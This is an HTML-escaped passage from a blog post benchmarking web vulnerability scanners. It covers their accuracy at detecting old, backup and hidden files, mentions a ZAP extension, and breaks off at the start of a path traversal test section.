&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The various plugins and features are based on a scan
  engine, and changes made to the engine (or plugins) may cause some of them to
  malfunction.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Since there wasn&#39;t a unit test (or other pre/post build
  test method) for those plugins, newer versions were released while those
  plugins were not functioning, &lt;b&gt;maybe even for years&lt;/b&gt;, and without
  anybody knowing about it.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Not so scary when considering , let&#39;s say - small scale
  projects, &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;But &lt;b&gt;VERY&lt;/b&gt; &lt;b&gt;scary &lt;/b&gt;when you consider a product
  update that causes many plugins to malfunction in a scanner with &lt;b&gt;50000&lt;/b&gt;
  plugins, which is released &lt;b&gt;after &lt;/b&gt;the organization &lt;b&gt;tested it&lt;/b&gt;
  successfully and used it for years, and while the official recommendation of
  the vendor was to install the update.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The vendor may never know, and the customer/user may only
  discover the issue after vulnerabilities that the product was suppose to
  identify will be exploited.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Customers that are &lt;b&gt;currently&lt;/b&gt; &lt;b&gt;not aware&lt;/b&gt; of a &lt;b&gt;problem&lt;/b&gt;,
  vendors that &lt;b&gt;may never be&lt;/b&gt;, and entities that can &lt;b&gt;abuse that problem&lt;/b&gt;
  are a terrible combination… No malice intended.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to assess the detection accuracy of different old/backup/hidden
file instances, I used a total of &lt;b&gt;184&lt;/b&gt; test cases (many of them simulating
files created in windows XP / windows 7 developer stations, as well as in
common Linux flavors such as Ubuntu, Debian and Fedora). I also used three main
groups of false positive behaviors - each representing real life scenarios that
vulnerability scanners can experience. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The comparison of the scanners&#39; old, backup and unreferenced
files detection accuracy is documented in detail in the following section of
sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;color: blue; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;a href=&quot;http://sectoolmarket.com/old-backup-and-unreferenced-files-detection-accuracy-unified-list.html&quot;&gt;http://sectoolmarket.com/old-backup-and-unreferenced-files-detection-accuracy-unified-list.html&lt;/a&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note:&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; as
mentioned earlier, I saw various features in several of the tested tools that
were supposed to identify additional results, but for some reason did not
function. My current assumption (and that&#39;s all that is – my assumption) is
that the reason is related to bugs in the engine or the module of those tools.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As luck (or lack of) would have it, the same problem seemed
to persist for many vendors in that specific category of tests. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Disclaimer: &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The results of OWASP ZAP in the obsolete file detection test
were obtained using an external ZAP extension called &lt;b&gt;&lt;a href=&quot;https://github.com/hacktics/good-old-files&quot;&gt;Good-Old-Files&lt;/a&gt;&lt;/b&gt; (GoF -
included in ZAP built-in marketplace). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The extension was written by a colleague of mine by the name
of &lt;a href=&quot;https://twitter.com/Michal_Golds&quot;&gt;Michal Goldstein&lt;/a&gt;, and was
originally inspired (to the previous extension authors) by various modules in &lt;b&gt;W3AF&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;She was &lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;not&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt;aware&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
of the benchmark, or to the fact I was assessing her project, and when I built
the testing platform, I used input from a collection of tools and sources to
build the benchmark test-bed, including GoF/W3AF.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Those of you that believe that might have affected the
testing process may feel free to ignore the results of that tool.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Result Chart Glossary&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note that the &lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case
detection accuracy, while the &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt; &lt;/b&gt;bar
represents false positive &lt;u&gt;categories&lt;/u&gt; detected by the tool (which may
result in more instances then what the bar actually presents, when compared to
the detection accuracy bar).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Old/Backup/Hidden File Detection Accuracy of
Commercial/SAAS Scanners &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_22&quot;
 o:spid=&quot;_x0000_i1050&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:192pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image033.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji3Z9lWkb61giQAAZUpY6sQo51aTOApA98BFGhKwk6rShcpJpuSXE9IiY1izf9bbmGoUVCAEZPUvcdKTAXiNNz_elCb4-52_M1hUuat4ZHsNxeaSPTHsN5qmGgPuYmoKCWRT7vRcr2XV4/s1600/%252810%2529+Test+4-+Commercial+AND+SAAS+-+Backup+Files.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji3Z9lWkb61giQAAZUpY6sQo51aTOApA98BFGhKwk6rShcpJpuSXE9IiY1izf9bbmGoUVCAEZPUvcdKTAXiNNz_elCb4-52_M1hUuat4ZHsNxeaSPTHsN5qmGgPuYmoKCWRT7vRcr2XV4/s1600/%252810%2529+Test+4-+Commercial+AND+SAAS+-+Backup+Files.png&quot; height=&quot;296&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&lt;o:p&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Old/Backup/Hidden File Detection Accuracy of
Opensource/Free Scanners &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_23&quot;
 o:spid=&quot;_x0000_i1049&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:120pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image035.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimy8vGIkeWkNdNu8ALDg4wCp2oKvI4h5SNN4I07KVS_CIWM0xo0XQHMvKsfftD-RCTdKV1KnUt8e788EwTQy4KohLiqENYEXpVddlsPR76KZ_6yVJs30dJCxQcsxJ6riRgRuJBH6nrrr0/s1600/%252811%2529+Test+4-+Opensource+-+Backup+Files.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimy8vGIkeWkNdNu8ALDg4wCp2oKvI4h5SNN4I07KVS_CIWM0xo0XQHMvKsfftD-RCTdKV1KnUt8e788EwTQy4KohLiqENYEXpVddlsPR76KZ_6yVJs30dJCxQcsxJ6riRgRuJBH6nrrr0/s1600/%252811%2529+Test+4-+Opensource+-+Backup+Files.png&quot; height=&quot;184&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Old/Backup/Hidden File Detection Accuracy of Scanners –
Unified List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_24&quot;
 o:spid=&quot;_x0000_i1048&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:320.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image037.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXAipHYttfwLR0UD0LhcjTPFKOgIXP22QNeTJ7jW69rSyAmvDG9mOUMnx8ks2bx4lEHG0ZaWqv_hxUYnZhsFXn2zZLubrJydcGYzZhsiCpgJPz2oultDILIDDFUqhI6lzTxMORqBjrM8/s1600/%252812%2529+Test+4-+Unified+-+Backup+Files.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXAipHYttfwLR0UD0LhcjTPFKOgIXP22QNeTJ7jW69rSyAmvDG9mOUMnx8ks2bx4lEHG0ZaWqv_hxUYnZhsFXn2zZLubrJydcGYzZhsiCpgJPz2oultDILIDDFUqhI6lzTxMORqBjrM8/s1600/%252812%2529+Test+4-+Unified+-+Backup+Files.png&quot; height=&quot;494&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;12. Test V - Path Traversal / LFI Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The fifth assessment criterion is identical to the previous
benchmark - the detection accuracy of &lt;b&gt;Path Traversal&lt;/b&gt; (a.k.a &lt;b&gt;Directory
Traversal&lt;/b&gt;), an assessment feature that was implemented in WAVSEP v1.2, and
tested in the &lt;a href=&quot;http://sectooladdict.blogspot.co.il/2012/07/2012-web-application-scanner-benchmark.html&quot;&gt;2012
benchmark&lt;/a&gt; for the first time.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It&#39;s also the third most commonly implemented attack vector
in web application scanners, and a significant attack vector in its own right.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
